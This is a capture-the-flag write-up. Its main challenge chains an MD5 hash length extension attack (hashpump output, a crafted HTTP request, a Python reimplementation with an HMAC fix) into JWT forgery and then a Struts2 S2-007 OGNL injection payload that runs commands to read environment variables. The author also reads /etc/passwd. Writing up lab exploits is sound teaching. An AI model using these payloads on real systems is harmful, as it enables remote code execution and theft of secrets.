snippingTools

The CVE in the Windows 11 Snipping Tool. Tool used: frankthetank-music/Acropalypse-Multi-Tool: Easily detect and restore Acropalypse vulnerable PNG and GIF files with simple Python GUI. (github.com). It throws errors on Windows but runs fine on Linux; I wasted a long time fiddling with that, annoying.

old language

Google reverse image search identifies the font: Dovahkiin font (fonts2u.com). Just map the glyphs across one by one.

jwt2structs

View the page source:

```html
<body>
<!-- JWT_key.php -->
You are now logged in as user. Try to become admin.
</body>
```

Visit /JWT_key.php:

```php
<?php
highlight_file(__FILE__);
include "./secret_key.php";
include "./salt.php";
//$salt = XXXXXXXXXXXXXX // the salt include 14 characters
//md5($salt."adminroot")=e6ccbf12de9d33ec27a5bcfb6a3293df
@$username = urldecode($_POST["username"]);
@$password = urldecode($_POST["password"]);
if (!empty($_COOKIE["digest"])) {
    if ($username === "admin" && $password != "root") {
        if ($_COOKIE["digest"] === md5($salt.$username.$password)) {
            die ("The secret_key is ". $secret_key);
        }
        else {
            die ("Your cookies don't match up! STOP HACKING THIS SITE.");
        }
    }
    else {
        die ("no no no");
    }
}
```

First time I have run into a hash length extension attack. Using the tool hashpump:

```text
hashpump
Input Signature: e6ccbf12de9d33ec27a5bcfb6a3293df
Input Data: root
Input Key Length: 19 # i.e. the 14-character salt plus the 5-character "admin"
Input Data to Add: root
6aa42454d4236337702b321ee8841237
root\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xb8\x00\x00\x00\x00\x00\x00\x00root
```

Replace each \x with % and send the request:

```http
POST /JWT_key.php HTTP/1.1
Host: 140.210.223.216:55557
Content-Length: 155
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.51
Origin: http://140.210.223.216:55557
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://140.210.223.216:55557/JWT_key.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: digest=6aa42454d4236337702b321ee8841237
Connection: close

password=root%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%b8%00%00%00%00%00%00%00root&username=admin
```

The response comes back with The secret_key is sk-he00lctf3r. By the way, I spent a long time stuck here and still can't figure out why the same parameters, producing the same payload (which I double-checked), failed in the afternoon but worked in the evening. During local testing the password variable also accidentally picked up an extra newline; I assumed the IDE was just soft-wrapping it for readability and burned ages on that too. Unbelievable.
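To make clear why md5($salt.$username.$password) can be extended at all, here is an added example that is not the challenge's code nor hashpump's: a small MD5 whose chaining state can be seeded from an existing digest. It reproduces the extension step above for any key length (not just 19), and then shows that an HMAC keyed with the same salt does not accept the forged pair. The salt is a constructed value, and all function names are my own.

```python
import hashlib
import hmac
import math
import struct

# Added example, not the challenge's or hashpump's code. MD5 round
# constants, shift table and initial chaining values from the MD5 spec.
_S = [7, 12, 17, 22] * 4 + [5, 9, 14, 20] * 4 + [4, 11, 16, 23] * 4 + [6, 10, 15, 21] * 4
_K = [int(abs(math.sin(i + 1)) * 2 ** 32) & 0xFFFFFFFF for i in range(64)]
_INIT = (0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476)
_MASK = 0xFFFFFFFF


def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & _MASK


def md5_padding(total_len):
    """The 0x80 byte, zero fill and 64-bit little-endian bit length that MD5
    appends to a total_len-byte message; this is the 'glue' hashpump prints."""
    zeros = (55 - total_len) % 64
    return b"\x80" + b"\x00" * zeros + struct.pack("<Q", total_len * 8)


def _compress(state, block):
    a, b, c, d = state
    m = struct.unpack("<16I", block)
    for i in range(64):
        if i < 16:
            f, g = (b & c) | (~b & d), i
        elif i < 32:
            f, g = (d & b) | (~d & c), (5 * i + 1) % 16
        elif i < 48:
            f, g = b ^ c ^ d, (3 * i + 5) % 16
        else:
            f, g = c ^ (b | ~d), (7 * i) % 16
        f = (f + a + _K[i] + m[g]) & _MASK
        a, d, c, b = d, c, b, (b + _rotl(f, _S[i])) & _MASK
    return tuple((x + y) & _MASK for x, y in zip(state, (a, b, c, d)))


def _md5_from_state(state, data, total_len):
    """Absorb data (plus the padding for a total_len-byte message) starting
    from an arbitrary chaining state and return the hex digest."""
    data += md5_padding(total_len)
    for off in range(0, len(data), 64):
        state = _compress(state, data[off:off + 64])
    return struct.pack("<4I", *state).hex()


def md5_hex(data):
    return _md5_from_state(_INIT, data, len(data))


def length_extend(digest_hex, known_data, key_len, append):
    """Given md5(key || known_data) and only len(key), return
    (forged_digest, new_data) with md5(key || new_data) == forged_digest.
    The digest IS the chaining state after the padded first message, so
    hashing can simply continue from it; no secret is needed."""
    state = struct.unpack("<4I", bytes.fromhex(digest_hex))
    glue = md5_padding(key_len + len(known_data))
    new_data = known_data + glue + append
    forged = _md5_from_state(state, append, key_len + len(new_data))
    return forged, new_data


def demo(salt=b"constructed-salt"):
    """Mirror the challenge check: the server computes md5(salt.'admin'.password).
    The salt is constructed; the attacker knows only its length."""
    digest = hashlib.md5(salt + b"admin" + b"root").hexdigest()
    forged, new_password = length_extend(digest, b"root", len(salt) + 5, b"root")
    # md5(salt . username . password) accepts the forged digest/password pair...
    naive_accepts = hashlib.md5(salt + b"admin" + new_password).hexdigest() == forged
    # ...but an HMAC keyed with the salt does not match the forged tag
    tag = hmac.new(salt, b"admin" + new_password, hashlib.md5).hexdigest()
    hmac_accepts = hmac.compare_digest(tag, forged)
    return naive_accepts, hmac_accepts
```

For a 19-byte prefix and the 4-byte data "root", md5_padding(23) is exactly the glue in the hashpump output above: 0x80, 32 zero bytes, then 0xb8 (184 bits) and seven zero bytes. The server-side fix in PHP is the same one demo() illustrates: compute the tag with hash_hmac() keyed on the salt and compare it with hash_equals(), rather than hashing the salt as a prefix and comparing with ===.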

Back on the landing page, it hints at logging in as admin, and the challenge name hints at JWT, so use the online tool JSON Web Tokens - jwt.io. Original cookie:

```text
access_token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJ1c2VyIiwiZXhwIjoyMDA2MjYwOTQ4fQ.l3rpRNUC9DwgI74bGFnNier8byigwXzRyIDWv-w5oOY
```

```text
PAYLOAD:DATA
{
  "sub": "user",
  "exp": 2006260948
}
```

Change user to admin, paste secret_key into VERIFY SIGNATURE, and obtain the new cookie:

```text
access_token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJhZG1pbiIsImV4cCI6MjAwNjIyNjQ3Nn0.829HbL3GslmimsCi_eHRuGusewFL4dul4uYE69VOQ_k
```

Send the request with the modified cookie and it lands directly on the /admiiiiiiiiiiin/ page. From the challenge hint this is a Struts2 vulnerability; going through the list of Struts2 vulnerabilities, it is S2-007, where a failed type-conversion check leads to execution of malicious code. Reference: S2-007 Remote Code Execution reproduction - Tencent Cloud Developer Community (tencent.com)


Test the age field with '+(1+1)+'; it returns 11, confirming the vulnerability exists. Execute the payload:

```text
' + (#_memberAccess["allowStaticMethodAccess"]=true,#foo=new java.lang.Boolean("false") ,#context["xwork.MethodAccessor.denyMethodExecution"]=#foo,@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('cat /proc/self/environ').getInputStream())) + '
```

This returns the flag from the environment variables: FLAG=flag{7r0m_jwt_t0_struts2}

As usual I cat /etc/passwd first, then oddly could not cat /flag or /flag.txt at all; but the environment variables are an old friend too, and one cat there found it.